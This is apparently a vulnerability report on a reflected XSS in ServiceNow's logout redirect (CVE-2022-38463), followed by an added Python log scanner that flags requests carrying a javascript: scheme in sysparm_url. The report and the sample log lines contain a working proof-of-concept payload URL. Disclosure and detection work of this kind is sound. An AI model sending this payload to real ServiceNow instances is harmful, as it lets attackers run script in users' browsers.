Description:
XSS in ServiceNow logout
https://██████:443/logout_redirect.do?sysparm_url=//j\\javascript%3Aalert(document.domain)
https://nvd.nist.gov/vuln/detail/CVE-2022-38463
An unauthenticated remote attacker can execute code in the user's browser context. The user must click on a malicious link.
███████
ServiceNow prior to San Diego SP6
CVE-2022-38463
Click on https://█████:443/logout_redirect.do?sysparm_url=//j\\javascript%3Aalert(document.domain)
Upgrade to a patched version of ServiceNow.
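
A log check for the request shape in this report, as an added example that is not part of the original report or of ServiceNow's code: it flags access-log requests to `logout_redirect.do` whose `sysparm_url` value contains a `javascript:` scheme after URL-decoding. The function names, the combined-log-style line format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/logout_redirect.do"   # endpoint named in the report
PARAM = "sysparm_url"              # parameter named in the report
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"javascript\s*:", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so nested encoding does not hide the scheme."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_redirect(target):
    """Return the decoded sysparm_url value if it contains javascript:, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        # Drop tab/CR/LF, which browsers ignore inside a URL scheme.
        value = re.sub(r"[\t\r\n]", "", decode_fully(raw))
        if SCHEME_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        value = suspicious_redirect(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample access-log lines (not taken from the report).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /logout_redirect.do?sysparm_url=/welcome.do HTTP/1.1" 302 0',
    r'192.0.2.11 - - [01/Jan/2023:10:00:05 +0000] "GET /logout_redirect.do?sysparm_url=//j\\javascript%3Aalert(document.domain) HTTP/1.1" 200 512',
    r'192.0.2.12 - - [01/Jan/2023:10:00:09 +0000] "GET /logout_redirect.do?sysparm_url=%2F%2Fj%5C%5Cjavascript%3Aalert(document.domain) HTTP/1.1" 200 512',
    r'192.0.2.13 - - [01/Jan/2023:10:00:12 +0000] "GET /other.do?sysparm_url=javascript%3Avoid(0) HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM}={value}")
```

A hit only shows that such a link was requested; it complements the upgrade and does not replace it.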